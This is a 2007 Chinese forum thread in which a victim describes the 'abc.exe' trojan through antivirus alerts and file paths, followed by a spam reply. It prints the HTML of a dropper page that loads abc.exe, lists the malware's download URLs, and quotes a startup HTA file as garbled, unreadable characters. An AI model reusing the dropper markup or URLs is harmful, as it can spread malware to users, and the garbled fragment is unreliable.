逐梦论坛 » 软硬兼施 » abc.exe 病毒

shillan 发表于 2007-6-16 13:51

abc.exe 病毒

[color=blue]现象：[/color]
1、开机时，瑞星实时监控提示：
[quote]trojan.dl.delf.yrg    删除成功   c:\documents and settings\administrator\local settings\temporary internet files\content.ie5\n2hbwtbz     abc[1].exe[/quote]
或

[quote]trojan.dl.mnless.anq    删除成功     c:\documents and settings\administrator\local settings\temporary internet files\content.ie5\zmfsuh8w    abc[1].exe>>upx_a[/quote]

若安装的卡巴斯基，则提示如下图：

[img]http://www.zhumeng.org/attachments/fileType/jpg.gif[/img]此主题相关图片
[img]http://www.zhumeng.org/attachments/2007/06/16/132910.jpg[/img]

[img]http://www.zhumeng.org/attachments/fileType/jpg.gif[/img]此主题相关图片
[img]http://www.zhumeng.org/attachments/2007/06/16/132930.jpg[/img]

删除后，再次开机时，还会出现。

2、c:\documents and settings\administrator\local settings\temporary internet files\中发现如下两文件：
downmm.html（http://www.if56.cn/lo/downmm.html）和abc.exe（http://www.if56.cn/lo/abc.exe）

如下图：
[img]http://www.zhumeng.org/attachments/fileType/jpg.gif[/img]此主题相关图片
[url=http://www.zhumeng.org/attachments/2007/06/16/134607.jpg][img]http://www.zhumeng.org/attachments/2007/06/16/134607s.jpg[/img][/url]

downmm.html的内容如下：
[code]<html>
<title>
downmm
</title>
<script src="abc.exe"></script>
<body>
start download.............................
</body>
</html>[/code]

3、“开始→所有程序→启动”中出现：“windows.hta”，“windows.hta”中内容如下：
[code]
tg!     稈?蚕?  _?
        g 噎c?胂般  ?   

      
  
?幎雖?嶖  _?   
    
  
                    |  ?等骪??  dw=   

wwindwind 发表于 2009-9-9 23:01

嘻嘻~`` 看了楼主的资料，〖黄金算命大师〗预测楼主今年有桃花运~```

查看完整版本: abc.exe 病毒